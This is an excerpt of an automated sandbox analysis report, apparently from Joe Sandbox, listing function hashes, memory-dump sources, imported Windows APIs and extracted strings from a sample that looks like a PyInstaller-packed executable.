                                                                                                    • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                    • Instruction ID: 62bf1dfb38da1384460cc57ca1aa64e7bfee8c412c50a73c82983635a75a3024
                                                                                                    • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                    • Instruction Fuzzy Hash: F351A332B18651C5E7299F29E04023CA7B2EB45B68FB64131CE4D577ACDB3AE852C750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                    • Instruction ID: b34474c0a69bb80e83de1f966a7bdcf0ec4a81b3544016cf41d5954b90d7102b
                                                                                                    • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                    • Instruction Fuzzy Hash: B2519136A18651C6E728AF29E250338B7B2EB44B58FB84131CE4D5779CDB3AE843C750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                    • Instruction ID: 47ad73d5bd198edc365a319da9f89c75b59723dfe0447757496cf67b14cf26f9
                                                                                                    • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                    • Instruction Fuzzy Hash: EE51BE36A18A51C6E7289F29E14023CA7B2EB48F58FB54135CE4D5779CCB3AEC42C750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                    • Instruction ID: 16ea62473d637305824ed48a9159eee2e174e7dc6cd634dc143f0a2ac701f499
                                                                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                    • Instruction Fuzzy Hash: 5C410B52D4974AC4E95D6F1895107B896A2EF13BA0DF81270DD9ED73CFCC2D6D878120
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BoundaryDeleteDescriptorErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2050971199-0
                                                                                                    • Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                                                    • Instruction ID: b6e40b3c358befd15e16e28af58e237d059e3afdface20892f382954183d1870
                                                                                                    • Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                                                    • Instruction Fuzzy Hash: EA410562714A54C2EF08DF2AE924169F3A2BB48FD4B999432EE0D97B58DE3CC0428300
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                                                                    • Instruction ID: b128b288ba0cbf61b1951abef876cbec74922edc27a95ae485e06bb8ef9c42b5
                                                                                                    • Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                                                                    • Instruction Fuzzy Hash: 5B31A931718B81C1E759BF25748013EEAE6AB84B90F644239EA5D53BD9DF3CD0019714
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                    • Instruction ID: 75ea3fb266e7dfd02d3720874cf29f0caa2d4f1a1e95c0bc349e344b494e1431
                                                                                                    • Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                    • Instruction Fuzzy Hash: 27F06271B18295CFDBA99F29B842629B7E0F708380FD08039E68DC3F04D67C94608F14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                    • Instruction ID: e80e3c6708a41bc991cd9543f1d33e8092f9b33ee473e3e3883c586c357cfcdf
                                                                                                    • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                    • Instruction Fuzzy Hash: BFA0022195DC26D4EA4CEF04FA50135F339FB60700BE01031D00D815A19F3CB800C730
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A50C0
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5101
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5126
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A514B
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5173
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A519B
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51C3
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51EB
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5213
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                    • API String ID: 190572456-2007157414
                                                                                                    • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                    • Instruction ID: b977056ebd8f976bdca1b9f7a3876c64bf4bdb26c63be015a12d340282d95314
                                                                                                    • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                    • Instruction Fuzzy Hash: 1112A2A4A4EB03D1FA1DFF15B9101B8A3B0AF19751BF41835D80E527A0EF3CB95AC661
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9
                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7691A7C97,?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A782C
                                                                                                      • Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                    • API String ID: 1662231829-930877121
                                                                                                    • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                    • Instruction ID: 3ec37d6ba19b5a3505ac5e70bc2439cd57e8d762e2278291e358dffc35c70231
                                                                                                    • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                    • Instruction Fuzzy Hash: BB419711F1D643C1FA59BF25F8516B9E271AF44790FE44433D64E82E99EE2CE904C760
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                    • String ID: P%
                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                    • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                    • Instruction ID: 76a5a1673db0565395af148334a9a4b4b0236263a3ba342845590c5ce42888af
                                                                                                    • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                    • Instruction Fuzzy Hash: 6D51E7266087A1C6D6389F26B4181BAF7B1F798B62F504121EBDF83684DF3CD045DB20
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: -$:$f$p$p
                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                    • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                    • Instruction ID: b397aba752aed9b750f1ab8a257efd6968714916559e383f963850711a6956da
                                                                                                    • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                    • Instruction Fuzzy Hash: A3128162A08243C6FB68BF15F154279F673FB40754FE44136D69A866CCDB3CE9908B24
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: f$f$p$p$f
                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                    • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                    • Instruction ID: f19603c7e64af85dfceb716c266e3bccffdf2a7e8516f712b8c0d46b6fa7cf23
                                                                                                    • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                    • Instruction Fuzzy Hash: EB125062E0D143C6FB28BE15B254779E6B3FB80754FE84036D699466CCDB7CE9808B60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                    • API String ID: 2030045667-3659356012
                                                                                                    • Opcode ID: 535431cfb947c7d8ada28fe56dc21b0bf9e6ffde1e3e3f9903ada198aa106e64
                                                                                                    • Instruction ID: dbb8be42ad3c6ab9ee10c9e73587333f48a04fe616b30de97dba3e62b82e7663
                                                                                                    • Opcode Fuzzy Hash: 535431cfb947c7d8ada28fe56dc21b0bf9e6ffde1e3e3f9903ada198aa106e64
                                                                                                    • Instruction Fuzzy Hash: E6415121B08646C2EA28BF22B9405BAE3B1BF54BC4FE44431DD5E47F95DE3CE9058750
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                    • API String ID: 2030045667-3659356012
                                                                                                    • Opcode ID: c393a79db86a02c5d931fe0659ff4a9d5d057637889ec1a9a1e980c0021db4f5
                                                                                                    • Instruction ID: 3795d5a3172879acb87a804f979797337d372a63ce1e00726d208c8a7d4166f7
                                                                                                    • Opcode Fuzzy Hash: c393a79db86a02c5d931fe0659ff4a9d5d057637889ec1a9a1e980c0021db4f5
                                                                                                    • Instruction Fuzzy Hash: 7D416E21B08642C1EA28BF26B8405BAE3B0FF45BD4FE44432DE5E57E95EE3CE9418710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 849930591-393685449
                                                                                                    • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                    • Instruction ID: 3de6a84cb46d98eb451ca9ec87a3f4b17f2614a0aad2d5357caf8b5cb3872a20
                                                                                                    • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                    • Instruction Fuzzy Hash: 01D17F32A08B41CAEB28AF65A5403BDB7B0FB54788FA04136EE4D57B95DF38E941C710
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE19C
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE1A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3013587201-537541572
                                                                                                    • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                    • Instruction ID: 06273b36a89951c0c3bee4e0ab3ca8dae2d5714d0e4321fdd823760d49318c3a
